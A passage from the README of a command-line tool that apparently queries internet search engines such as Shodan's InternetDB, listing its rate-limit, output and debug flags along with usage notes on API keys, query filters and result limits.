-rl, -rate-limit int maximum number of http requests to send per second
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-retry int number of times to retry a failed request (default 2)
OUTPUT:
-o, -output string output file to write found results
-f, -field string field to display in output (ip,port,host) (default "ip:port")
-j, -json write output in JSONL(ines) format
-r, -raw write raw output as received by the remote api
-l, -limit int limit the number of results to return (default 100)
-nc, -no-color disable colors in output
DEBUG:
-silent show only results in output
-version show version of the project
-v show verbose output
```
## Notes:
* **keys/ credentials** are required to configure before running or using this project.
* `query` flag supports **all and only filters supported by search engine.**
* results are limited to `100` as default and can be increased with `limit` flag.
* `shodan-idb` API doesn't requires an API key and works out of the box.
* `shodan-idb` API is used as **default** engine when **IP/CIDR** is provided as input.